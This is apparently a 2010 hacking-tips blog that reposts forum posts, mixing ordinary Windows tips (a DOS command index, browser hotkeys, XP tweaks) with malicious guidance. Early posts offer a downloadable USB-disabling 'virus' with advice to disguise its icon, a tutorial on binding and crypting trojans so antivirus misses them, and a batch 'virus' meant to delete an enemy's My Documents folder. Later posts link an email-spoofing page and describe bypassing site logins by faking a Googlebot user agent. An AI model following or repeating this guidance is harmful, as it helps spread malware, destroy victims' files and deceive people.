Thursday, April 29, 2010

Shut down all Usb ports on a Computer

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.
http://www.gohacking.com/downloads/sourc..._Block.rar

2. It contains the following 4 files.

* block_usb.c (source code)
* unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs. http://www.hackforums.net/showthread.php?tid=380282

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. You will have ti find your own icon changer, i canot find a good one ATM.

HowTO BETTER SPREAD

Hey Guys
this is a tutorial
about ,,How to better spread,,

The first thing you do is do dowload a binder
if you don´t know where to find a binder
choose this one
http://www.hackforums.net/showthread.php...ght=binder

After you downloaded that you need a fake application
if you want to you can take mine
http://www.hackforums.net/showthread.php?tid=378925
http://www.hackforums.net/showthread.php?tid=382178
http://www.hackforums.net/showthread.php?tid=378882

After you downloaded these things you must bind you trojan/virus
with the binder
1.Open Binder
2.Choose the fake application
3.Choose the virus/trojan
4.bind it

then you´re ready

TIPP:
you can crypt the binded trojan
after you done that the av´s
can´t find a trojan/virus in your binded file

How To Send An Email From Any Email

Step 1: Go to: http://www.gta-parba.yc.cz/meil_fuck.php

Step 2: Type in the email you'd like to send it from.

Step 3: Type which email you would like to send it too

Step 4: Type the message you'd like the person your sending it too to recieve.

Step 5: Send, and complete, enjoy hope this was helpful to some of you guys :)

Saturday, April 24, 2010

SIMPLE VIRUS CODING

Run this on your own responsibility*/
VIRUS CODE-1

IT DELETES THE MY DOCUMENTS FOLDER OF UR ENEMY.
HERE'S WHAT U SHOULD DO

OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.
THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT WITH BAT FILE Extention.
I MEAN SAVE IT LIKE VIRUS.BAT.
NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.

Code Is Below
rmdir C:\Documents and Settings \S\Q.

Trick to Show Your name after time in taskbar...

Try this trick to add up ur name in place of AM and PM beside time
Its simple
Step-1:- Navigate to -> Start -> Control Pannel -> Regional and Language Option -> Click on Customize -> Go to TIME Tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ...
Did It change? If not, follow step-2 below.

Step2:- Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time changes in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Secure Your Windows Xp Computer

With viruses, spyware and hackers round the corner, there could be many ways by which your PC would be prone to attacks. My PC, which is installed with XP, had to be formatted 2-3 times recently due to virus attack and I had to reinstall the XP on all the occasions. Here are few simple steps to make your Windows XP more secure.

Turn on Automatic Updates: Update is a Windows XP utility which helps to download the latest updates from Microsoft website. With this your PC will have the latest security updates. But one of the disadvantages of using Automatic updates is that it consumes a lot hard disk space.



Turn on Windows Firewall: If you have Service Pack 2 installed in your PC, you can turn on the free Firewall provided by Windows. Although the firewall will not give you a 100% protection, it does give some protection.
Install an Anti-virus Software: There are lot of anti-virus softwares available. Make sure you install one as viruses are the most common type of attack. Not only you install the anti-virus, update it with the latest security updates once in a while.
Protect from Spywares and Adwares: Spywares and Adwares are other common types of attacks on your PC. There are lot of free Spyware and Adware removal tools. Install one and scan your computer once in a while.
Be Careful while using Internet: Do not click on any malicious links and also do not download any attachments or softwares without scanning them. If you use a floppy drive or a CD drive, scan the files before you open or copy to the system.
These are fews steps to make your PC more secure. Although with these steps, it may not be 100% secure, but as wisely said-”Prevention is better than cure”







ADVANCED SECURITY

Do you work in a corporate environment where you don't appreciate your co-workers or boss having access to your comp and private files when you are not around?


You can provide added level of security to your WINDOWS XP System. This is called securing your Windows XP accounts database. You can store all information related to your accounts in a encrypted form on a floppy disk. What this would do is that if You do not have access to your floppy disk, You can not access the system. I am not sure You realized what I just said ! Even if You know your userid/password, You will not be able to access the system unless and until You have this startup disk.

The process of generating this secure startup floppy disk is simple. Go to START-RUN and type syskey. You will see a window come up. Click on Upgrade command button. You would see another window popping up which will give You the option of storing the encrypted accounts database either locally or on your floppy disk. Choose floppy disk and click OK and let the process complete. You are done.

Next time You reboot the computer and get to the logon prompt, make sure that You have the floppy disk available in A: drive else You can not log on.

Saturday, April 17, 2010

How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail

When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.

Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is

65.119.112.245.
That is be the IP address of the sender!
5. Track the IP address of the sender

Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! headers : name
Look for Received: from followed by the IP address between square brackets [ ]. Here, it is 202.65.138.109.
That is be the IP address of the sender!
6. Track the IP address of the sender

Finding IP address in Hotmail

1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.
7. Or else if you have headers like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] (Spam mail). Jump to step 9.
8. * If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.
9. Track the IP address of the sender

A Complete list of DOS Command Index

  DOS Command Index
Information about all current DOS commands
 
APPEND
(External)

APPEND ;
APPEND [d:]path[;][d:]path[...]
APPEND [/X:on|off][/path:on|off] [/E]

Displays or sets the search path for data files. DOS will search the specified path(s) if the file is not found in the current path.

 
ASSIGN
(External)

ASSIGN x=y [...] /sta

Redirects disk drive requests to a different drive.


ATTRIB
(External)

ATTRIB [d:][path]filename [/S]
ATTRIB [+R|-R] [+A|-A] [+S|-S] [+H|-H] [d:][path]filename [/S]

Sets or displays the read-only, archive, system, and hidden attributes of a file or directory.


BACKUP
(External)

BACKUP d:[path][filename] d:[/S][/M][/A][/F:(size)] [/P][/D:date] [/T:time] [/L:[path]filename]

Makes a backup copy of one or more files. (In DOS Version 6, this program is stored on the DOS supplemental disk.)


BREAK
(Internal)

BREAK =on|off

Used from the DOS prompt or in a batch file or in the CONFIG.SYS file to set (or display) whether or not DOS should check for a Ctrl + Break key combination.


BUFFERS
(Internal)

BUFFERS=(number),(read-ahead number)

Used in the CONFIG.SYS file to set the number of disk buffers (number) that will be available for use during data input. Also used to set a value for the number of sectors to be read in advance (read-ahead) during data input operations.


CALL
(Internal)

CALL [d:][path]batchfilename [options]

Calls another batch file and then returns to current batch file to continue.


CHCP
(Internal)

CHCP (codepage)

Displays the current code page or changes the code page that DOS will use.


CHDIR
(Internal)

CHDIR (CD) [d:]path
CHDIR (CD)[..]

Displays working (current) directory and/or changes to a different directory.


CHKDSK
(External)

CHKDSK [d:][path][filename] [/F][/V]

Checks a disk and provides a file and memory status report.


CHOICE
(Internal)

CHOICE [/C[:]keys] [/N][/S][/T[:]c,nn] [text]

Used to provide a prompt so that a user can make a choice while a batch program is running.


CLS (Clear Screen)
(Internal)

CLS

Clears (erases) the screen.


COMMAND
(External)

COMMAND [d:][path] [device] [/P][/E:(size)] [/MSG][/Y [/C (command)|/K (command)]

Starts a new version of the DOS command processor (the program that loads the DOS Internal programs).


COMP
(External)

COMP [d:][path][filename] [d:][path][filename] [/A][/C][/D][/L][/N:(number)]

Compares two groups of files to find information that does not match. (See FC command).


COPY
(Internal)

COPY [/Y|-Y] [/A][/B] [d:][path]filename [/A][/B] [d:][path][filename] [/V]
or
COPY [/Y|-Y][/A][/B] [d:][path]filename+[d:][path]filename[...][d:][path][filename] [/V]

Copies and appends files.


COUNTRY
(Internal)

COUNTRY=country code,[code page][,][d:][filename]

Used in the CONFIG.SYS file to tell DOS to use country-specific text conventions during processing.


CTTY
(Internal)

CTTY (device)

Changes the standard I/O (Input/Output) device to an auxiliary device.


DATE
(Internal)

DATE mm-dd-yy

Displays and/or sets the system date.


DBLSPACE
(External)

DBLSPACE / automount=drives
DBLSPACE /chkdsk [/F] [d:]
DBLSPACE /compress d: [/newdrive=host:] [/reserve=size] [/F]
DBLSPACE /create d: [/newdrive=host:] [/reserve=size] [/size=size]
DBLSPACE /defragment [d:] ]/F]
DBLSPACE /delete d:
DBLSPACE /doubleguard=0|1
DBLSPACE /format d:
DBLSPACE [/info] [d:]
DBLSPACE /list
DBLSPACE /mount[=nnn] host: [/newdrive=d:]
DBLSPACE /ratio[=ratio] [d:] [/all]
DBLSPACE /size[=size] [/reserve=size] d:
DBLSPACE /uncompress d:
DBLSPACE /unmount [d:]

A program available with DOS 6.0 that allows you to compress information on a disk.


DEBUG
(External)

DEBUG [pathname] [parameters]

An MS-DOS utility used to test and edit programs.


DEFRAG
(External)

DEFRAG [d:] [/F][/S[:]order] [/B][/skiphigh [/LCD|/BW|/GO] [/H]
DEFRAG [d:] [/V][/B][/skiphigh] [/LCD]|/BW|/GO] [/H]

Optimizes disk performance by reorganizing the files on the disk.


DEL (ERASE)
(Internal)

DEL (ERASE) [d:][path]filename [/P]

Deletes (erases) files from disk.


DELOLDOS
(External)

DELOLDOS [/B]

Deletes all files from previous versions of DOS after a 5.0 or 6.0 installation.


DELTREE
(External)

DELTREE [/Y] [d:]path [d:]path[...]

Deletes (erases) a directory including all files and subdirectories that are in it.


DEVICE
(Internal)

DEVICE=(driver name)

Used in the CONFIG.SYS file to tell DOS which device driver to load.


DEVICEHIGH
(Internal)

DEVICEHIGH=(driver name)

Like DEVICE, DEVICEHIGH is used in the CONFIG.SYS file to tell DOS which device driver software to use for devices; however, this option is used to install the device driver into the upper memory area.


DIR
(Internal)

DIR [d:][path][filename] [/A:(attributes)] [/O:(order)] [/B][/C][/CH][/L][/S][/P][/W]

Displays directory of files and directories stored on disk.


DISKCOMP
(External)

DISKCOMP [d:] [d:][/1][/8]

Compares the contents of two diskettes.


DISKCOPY
(External)

DISKCOPY [d:] [d:][/1][/V][/M]

Makes an exact copy of a diskette.


DOS
(Internal)

DOS=[high|low],[umb|noumb]

Used in the CONFIG.SYS file to specify the memory location for DOS. It is used to load DOS into the upper memory area and to specify whether or not the upper memory blocks will be used.


DOSKEY
(External)

DOSKEY [reinstall] [/bufsize=size][/macros][/history][/insert|/overstrike] [macroname=[text]]

Loads the Doskey program into memory which can be used to recall DOS commands so that you can edit them.


DOSSHELL
(External)

DOSSHELL [/B] [/G:[resolution][n]]|[/T:[resolution][n]]

Initiates the graphic shell program using the specified screen resolution.


DRIVPARM
(Internal)

DRIVPARM= /D:(number) [/C] [/F:(form factor)] [/H:(number)] [/I][ /N][/S:(number)] [/T:(tracks)]

Used in the CONFIG.SYS file to set parameters for a disk drive.


ECHO
(Internal)

ECHO on|off
ECHO (message)

Displays messages or turns on or off the display of commands in a batch file.


EDIT
(External)

EDIT [d:][path]filename [/B][/G][/H][/NOHI]

Starts the MS-DOS editor, a text editor used to create and edit ASCII text files.


EMM386
(External)

EMM386 [on|off|auto] [w=on|off]

Enables or disables EMM386 expanded-memory support on a computer with an 80386 or higher processor.


EXE2BIN
(External)

EXE2BIN [d:][path]filename [d:][path]filename

Converts .EXE (executable) files to binary format.


EXIT
(Internal)

EXIT

Exits a secondary command processor.


EXPAND
(External)

EXPAND [d:][path]filename [[d:][path]filename[ . . .]]

Expands a compressed file.


FASTHELP
(External)

FASTHELP [command][command] /?

Displays a list of DOS commands with a brief explanation of each.


FASTOPEN
(External)

FASTOPEN d:[=n][/X]

Keeps track of the locations of files for fast access.


FC
(External)

FC [/A][/C][/L][/Lb n][/N][/T][/W][number] [d:][path]filename [d:][path]filename

or (for binary comparisons)
FC [/B][/number] [d:][path]filename [d:][path]filename

Displays the differences between two files or sets of files.


FCBS
(Internal)

FCBS=(number)

Used in the CONFIG.SYS file to specify the number of file-control blocks for file sharing.


FDISK
(External)

FDISK [/status]

Prepares a fixed disk to accept DOS files for storage.


FILES
(Internal)

FILES=(number)

Used in the CONFIG.Sys file to specify the maximum number of files that can be open at the same time.


FIND
(External)

FIND [/V][/C][/I][/N] ÒstringÓ [d:][path]filename[...]

Finds and reports the location of a specific string of text characters in one or more files.


FOR
(Internal)

FOR %%(variable) IN (set) DO (command)

or (for interactive processing)
FOR %(variable) IN (set) DO (command)

Performs repeated execution of commands (for both batch processing and interactive processing).


FORMAT
(External)

FORMAT d:[/1][/4][/8][/F:(size)] [/N:(sectors)] [/T:(tracks)][/B|/S][/C][/V:(label)] [/Q][/U][/V]

Formats a disk to accept DOS files.


GOTO
(Internal)

GOTO (label)

Causes unconditional branch to the specified label.


GRAFTABL
(External)

GRAFTABL [(code page)]
GRAFTABL [status]

Loads a table of character data into memory (for use with a color/graphics adapter).


GRAPHICS
(External)

GRAPHICS [printer type][profile] [/B][/R][/LCD][/PB:(id)] [/C][/F][/P(port)]

Provides a way to print contents of a graphics screen display.


HELP
(External)

HELP [command] [/B][/G][/H][/NOHI]

Displays information about a DOS command.


IF
(Internal)

IF [NOT] EXIST filename (command) [parameters]
IF [NOT] (string1)==(string2) (command) [parameters]
IF [NOT] ERRORLEVEL (number) (command) [parameters]

Allows for conditional operations in batch processing.


INCLUDE
(Internal)

INCLUDE= blockname

Used in the CONFIG.SYS file to allow you to use the commands from one CONFIG.SYS block within another.


INSTALL
(Internal)

INSTALL=[d: ][\path]filename [parameters]

Used in the CONFIG.SYS file to load memory-resident programs into conventional memory.


INTERLINK
(External)

INTERLINK [client[:]=[server][:]]

Connects two computers via parallel or serial ports so that the computers can share disks and printer ports.


INTERSVR
(External)

INTERSVR [d:][...][/X=d:][...] [/LPT:[n|address]] [/COM:[n|address]][/baud:rate] [/B][/V]
INTERSVR /RCOPY

Starts the Interlink server.


JOIN
(External)

JOIN d: [d:path]
JOIN d: [/D]

Allows access to the directory structure and files of a drive through a directory on a different drive.


KEYB
(External)

KEYB [xx][,][yyy][,][d:][path]filename [/E][/ID:(number)]

Loads a program that replaces the support program for U. S. keyboards.

LABEL
(External)

LABEL [d:][volume label]

Creates or changes or deletes a volume label for a disk.

LASTDRIVE
(Internal)

LASTDRIVE=(drive letter)

Used in the CONFIG.SYS file to set the maximum number of drives that can be accessed.

LOADFIX
(Internal)

LOADFIX [d:][path]filename [parameters]

Ensures that a program is loaded above the first 64K of conventional memory, and runs the program.

LOADHIGH
(Internal)

LOADHIGH (LH) [d:][path]filename [parameters]

Loads memory resident application into reserved area of memory (between 640K-1M).


MEM
(External)

MEM [/program|/debug|/classify|/free|/module(name)] [/page]

Displays amount of installed and available memory, including extended, expanded, and upper memory.


MEMMAKER
(External)

MEMMAKER [/B][/batch][/session][/swap:d] [/T][/undo][/W:size1,size2]

Starts the MemMaker program, a program that lets you optimize your computer's memory.


MENUCOLOR
(Internal)

MENUCOLOR=textcolor,[background]

Used in the CONFIG.SYS file to set the colors that will be used by DOS to display text on the screen.


MENUDEFAULT
(Internal)

MENUDEFAULT=blockname, [timeout]

Used in the CONFIG.SYS file to set the startup configuration that will be used by DOS if no key is pressed within the specified timeout period.


MENUITEM
(Internal)

MENUITEM=blockname, [menutext]

Used in the CONFIG.SYS file to create a start-up menu from which you can select a group of CONFIG.SYS commands to be processed upon reboot.


MIRROR
(External)

MIRROR [d:]path [d:] path [...]
MIRROR [d1:][d2:][...] [/T(drive)(files)] [/partn][/U][/1]

Saves disk storage information that can be used to recover accidentally erased files.


MKDIR
(MD) (Internal)

MKDIR (MD) [d:]path

Creates a new subdirectory.



MODE
(External)

MODE n
MODE LPT#[:][n][,][m][,][P][retry]
MODE [n],m[,T]
MODE (displaytype,linetotal)
MODE COMn[:]baud[,][parity][,][databits][,][stopbits][,][retry]
MODE LPT#[:]=COMn [retry]
MODE CON[RATE=(number)][DELAY=(number)]
MODE (device) CODEPAGE PREPARE=(codepage) [d:][path]filename
MODE (device) CODEPAGE PREPARE=(codepage list) [d:][path]filename
MODE (device) CODEPAGE SELECT=(codepage)
MODE (device) CODEPAGE [/STATUS]
MODE (device) CODEPAGE REFRESH

Sets mode of operation for devices or communications.


MORE
(External)

MORE < (filename or command)
(name)|MORE

Sends output to console, one screen at a time.



MOVE
(Internal)

MOVE [/Y|/-Y] [d:][path]filename[,[d:][path]filename[...]] destination

Moves one or more files to the location you specify. Can also be used to rename directories.



MSAV
(External)

MSAV [d:] [/S|/C][/R][/A][/L][/N][/P][/F][/video][/mouse]
MSAV /video

Scans your computer for known viruses.



MSBACKUP
(External)

MSBACKUP [setupfile] [/BW|/LCD|/MDA]

Used to backup or restore one or more files from one disk to another.



MSCDEX
(External)

MSCDEX /D:driver [/D:driver2. . .] [/E][/K][/S][/V][/L:letter] [/M:number]

Used to gain access to CD-ROM drives (new with DOS Version 6).



MSD
(External)

MSD [/B][/I]
MSD [/I] [/F[d:][path]filename [/P[d:][path]filename [/S[d:][path]filename

Provides detailed technical information about your computer.



NLSFUNC
(External)

NLSFUNC [d:][path]filename

Used to load a file with country-specific information.



NUMLOCK
(Internal)

NUMLOCK=on|off

Used in the CONFIG.SYS file to specify the state of the NumLock key.



PATH
(Internal)

PATH;
PATH [d:]path[;][d:]path[...]

Sets or displays directories that will be searched for programs not in the current directory.



PAUSE
(Internal)

PAUSE [comment]

Suspends execution of a batch file until a key is pressed.



POWER
(External)

POWER [adv:max|reg|min]|std|off]

Used to turn power management on and off, report the status of power management, and set levels of power conservation.



PRINT
(External)

PRINT [/B:(buffersize)] [/D:(device)] [/M:(maxtick)] [/Q:(value] [/S:(timeslice)][/U:(busytick)] [/C][/P][/T] [d:][path][filename] [...]

Queues and prints data files.



PROMPT
(Internal)

PROMPT [prompt text] [options]

Changes the DOS command prompt.



RECOVER
(External)

RECOVER [d:][path]filename
RECOVER d:

Resolves sector problems on a file or a disk. (Beginning with DOS Version 6, RECOVER is no longer available ).



REM
(Internal)

REM [comment]

Used in batch files and in the CONFIG.SYS file to insert remarks (that will not be acted on).



RENAME (REN)
(Internal)

RENAME (REN) [d:][path]filename [d:][path]filename

Changes the filename under which a file is stored.



REPLACE
(External)

REPLACE [d:][path]filename [d:][path] [/A][/P][/R][/S][/U][/W]

Replaces stored files with files of the same name from a different storage location.



RESTORE
(External)

RESTORE d: [d:][path]filename [/P][/S][/B:mm-dd-yy] [/A:mm-dd-yy][/E:hh:mm:ss] [/L:hh:mm:ss] [/M][/N][/D]

Restores to standard disk storage format files previously stored using the BACKUP command.



RMDIR (RD)
(Internal)

RMDIR (RD) [d:]path

Removes a subdirectory.



SCANDISK
(External)

SCANDISK [d: [d: . . .]|/all][/checkonly|/autofix[/nosave]|/custom][/surface][/mono][/nosummay]
SCANDISK volume-name[/checkonly|/autofix[/nosave]|/custom][/mono][/nosummary]
SCANDISK /fragment [d:][path]filename
SCANDISK /undo [undo-d:][/mono]

Starts the Microsoft ScanDisk program which is a disk analysis and repair tool used to check a drive for errors and correct any problems that it finds.



SELECT
(External)

SELECT [d:] [d:][path] [country code][keyboard code]

Formats a disk and installs country-specific information and keyboard codes (starting with DOS Version 6, this command is no longer available).



SET
(Internal)

SET (string1)=(string2)

Inserts strings into the command environment. The set values can be used later by programs.


SETVER
(External)

SETVER [d:]:path][filename (number)][/delete][/quiet]

Displays the version table and sets the version of DOS that is reported to programs.



SHARE
(External)

SHARE [/F:space] [/L:locks]

Installs support for file sharing and file locking.



SHELL
(Internal)

SHELL=[d:][path]filename [parameters]

Used in the CONFIG.SYS file to specify the command interpreter that DOS should use.



SHIFT
(Internal)

SHIFT

Increases number of replaceable parameters to more than the standard ten for use in batch files.



SORT
(External)

SORT [/R][/+n] < (filename)
SORT [/R][/+n] > (filename2)

Sorts input and sends it to the screen or to a file.



STACKS
(Internal)

STACKS=(number),(size)

Used in the CONFIG.SYS file to set the number of stack frames and the size of each stack frame.



SUBMENU
(Internal)

SUBMENU=blockname, [menutext]

Used in the CONFIG.SYS file to create a multilevel menu from which you can select start-up options.



SUBST
(External)

SUBST d: d:path
SUBST d: /D

Substitutes a virtual drive letter for a path designation.



SWITCHES
(Internal)

SWITCHES= [/K][/F][/N][/W]

Used in the CONFIG.SYS file to configure DOS in a special way; for example, to tell DOS to emulate different hardware configurations.



SYS
(External)

SYS [source] d:

Transfers the operating system files to another disk.



TIME
(Internal)

TIME hh:mm[:ss][.cc][A|P]

Displays current time setting of system clock and provides a way for you to reset the time.



TREE
(External)

TREE [d:][path] [/A][/F]

Displays directory paths and (optionally) files in each subdirectory.



TYPE
(Internal)

TYPE [d:][path]filename

Displays the contents of a file.



UNDELETE
(External)

UNDELETE [d:][path][filename] [/DT|/DS|/DOS]
UNDELETE [/list|/all|/purge[d:]|/status|/load|/U|/S[d:]|/Td:[-entries]]

Restores files deleted with the DELETE command.



UNFORMAT
(External)

UNFORMAT d: [/J][/L][/test][/partn][/P][/U]

Used to undo the effects of formatting a disk.



VER
(Internal)

VER

Displays the DOS version number.



VERIFY
(Internal)

VERIFY on|off

Turns on the verify mode; the program checks all copying operations to assure that files are copied correctly.



VOL
(Internal)

VOL [d:]

Displays a disk's volume label.



VSAFE
(External)

VSAFE [/option[+|-]...] [/NE][/NX][Ax|/Cx] [/N][/D][/U]

VSAFE is a memory-resident program that continuously monitors your computer for viruses and displays a warning when it finds one.



XCOPY
(External)

XCOPY [d:][path]filename [d:][path][filename] [/A][/D:(date)] [/E][/M][/P][/S][/V][/W][Y\-Y]
Copies directories, subdirectories, and files.



Syntax Notes

To be functional, each DOS command must be entered in a particular way: this command entry structure is known as the command's "syntax." The syntax "notation" is a way to reproduce the command syntax in print.

For example, you can determine the items that are optional, by looking for information that is printed inside square brackets. The notation [d:], for example, indicates an optional drive designation. The command syntax, on the other hand, is how YOU enter the command to make it work.


Command Syntax Elements
1. Command Name

The DOS command name is the name you enter to start the DOS program (a few of the DOS commands can be entered using shortcut names). The DOS command name is always entered first. In this book, the command is usually printed in uppercase letters, but you can enter command names as either lowercase or uppercase or a mix of both.

2. Space

Always leave a space after the command name.

3. Drive Designation

The drive designation (abbreviated in this book as "d:") is an option for many DOS commands. However, some commands are not related to disk drives and therefore do not require a drive designation. Whenever you enter a DOS command that deals with disk drives and you are already working in the drive in question, you do not have to enter the drive designator. For example, if you are working in drive A (when the DOS prompt A> is showing at the left side of the screen) and you want to use the DIR command to display a directory listing of that same drive, you do not have to enter the drive designation. If you do not enter a drive designation, DOS always assumes you are referring to the drive you are currently working in (sometimes called the "default" drive).

4. A Colon

When referring to a drive in a DOS command, you must always follow the drive designator with a colon (:) (this is how DOS recognizes it as a drive designation).

5. Pathname

A pathname (path) refers to the path you want DOS to follow in order to act on the DOS command. As described in Chapter 3, it indicates the path from the current directory or subdirectory to the files that are to be acted upon.

6. Filename

A filename is the name of a file stored on disk. As described in Chapter 1, a filename can be of eight or fewer letters or other legal characters.

7. Filename Extension

A filename extension can follow the filename to further identify it. The extension follows a period and can be of three or fewer characters. A filename extension is not required.

8. Switches

Characters shown in a command syntax that are represented by a letter or number and preceded by a forward slash (for example, "/P") are command options (sometimes known as "switches"). Use of these options activate special operations as part of a DOS command's functions.

9. Brackets

Items enclosed in square brackets are optional; in other words, the command will work in its basic form without entering the information contained inside the brackets.

10. Ellipses

Ellipses (...) indicate that an item in a command syntax can be repeated as many times as needed.

11. Vertical Bar

When items are separated by a vertical bar (|), it means that you enter one of the separated items. For example: ON | OFF means that you can enter either ON or OFF, but not both

Internet Explorer Hotkeys

These are achieved by holding down the CONTROL (CTRL) key and pressing the assigned key
To Select all items on a webpage use CTRL and A.

To Copy a selected item to the clipboard use CTRL and C.

To Paste an item from the clipboard into a document use CTRL and V.

To Add the current page/document to your favorites use CTRL and D.

To Open the IE search utility use CTRL and E.

To Open the FIND box to search the current document use CTRL and F.

To Open the History utility use CTRL and H.

To Open the Favorites utility use CTRL and I.

To Go to a new location/document use CTRL and L. Also CTRL and O.

To Open a new Explorer window use CTRL and N.

To Print the current page/document use CTRL and P.

To Refresh the current page/document use CTRL and R or use the F5 key.

To Save the current document/page use CTRL and S.

To Close the current Explorer window use CTRL and W.
These are achieved by holding down and pressing a combination of keys

To go to your default homepage use ALT and the HOME key.

To go forward one page (equivalent to the FORWARD button) use ALT and the right arrow key.

To go back one page (equivalent to the BACK button) use ALT and the left arrow key.

Mozilla Firefox Hotkeys

CTRL + A
Select all text on a webpage
CTRL + B
Open the Bookmarks sidebar
CTRL + C
Copy the selected text to the Windows clipboard
CTRL + D
Bookmark the current webpage
CTRL + F
Find text within the current webpage
CTRL + G
Find more text within the same webpage
CTRL + H
Opens the webpage History sidebar
CTRL + I
Open the Bookmarks sidebar
CTRL + J
Opens the Download Dialogue Box
CTRL + K
Places the cursor in the Web Search box ready to type your search
CTRL + L
Places the cursor into the URL box ready to type a website address
CTRL + M
Opens your mail program (if you have one) to create a new email message
CTRL + N
Opens a new Firefox window
CTRL + O
Open a local file
CTRL + P
Print the current webpage
CTRL + R
Reloads the current webpage
CTRL + S
Save the current webpage on your PC
CTRL + T
Opens a new Firefox Tab
CTRL + U
View the page source of the current webpage
CTRL + V
Paste the contents of the Windows clipboard
CTRL + W
Closes the current Firefox Tab or Window (if more than one tab is open)
CTRL + X
Cut the selected text
CTRL + Z
Undo the last action

Find Invisibles on yahoo

How to know your friend is invisible or offline in yahoo messenger?

goto :  GET INVISIBLE BY KARIMKHAN

type your friend's ID and know about him or her....

ask me if you have anymore doubt on internet....

Friday, April 16, 2010

Improve WIN XP shutdown speed

This tweak reduces the time XP waits before


automatically closing any running programs when you give it the

command to shutdown.

Go to Start then select Run

Type 'Regedit' and click ok

Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'

Select 'WaitToKillAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now select 'HungAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'



Now find 'HKEY_USERS\.DEFAULT\Control Panel\Desktop'

Select 'WaitToKillAppTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Now find 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\'

Select 'WaitToKillServiceTimeout'

Right click and select 'Modify'

Change the value to '1000'

Click 'OK'

Increase your RAM and so system speed

Start any application, say Word. Open some large documents.

2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.

3). Now switch to Word and simply minimize it. (Don't use the Minimize All Windows option of the task bar).

4). Now go back to the Windows Task Manager and see where WINWORD.EXE is listed. Most probably you will not find it at the top. You will typically have to scroll to the bottom of the list to find Word. Now check out the amount of RAM it is using. Surprised? The memory utilization has reduced by a huge amount.

5). Minimize each application that you are currently not working on by clicking on the Minimize button & you can increase the amount of available RAM by a substantial margin. Depending upon the number and type of applications you use together, the difference can be as much as 50 percent of extra RAM.

In any multitasking system, minimizing an application means that it won't be utilized by the user right now. Therefore, the OS automatically makes the application use virtual memory & keeps bare minimum amounts of the code in physical RAM.

Monday, April 12, 2010

Free Access To Websites Without Registering

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.

Examples:
-http://www.nytimes.com/, -http://www.winnetmag.com/

etcetera.
Another (and better) way is changing the user agent of your browser to:

Googlebot/2.1+

-http://www.googlebot.com/bot.html

This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

-http://www.chrispederick.com/work/firefox/useragentswitcher/

and add the Googlebot user agent.

Have fun, Dead Dreamer!

-]Edit[- Now this kicks ass, was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites

And no, you cant access the hidden forums either, already tried that

Create one Click shutdown and reboot

Create One-Click Shutdown and Reboot Shortcuts:

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"

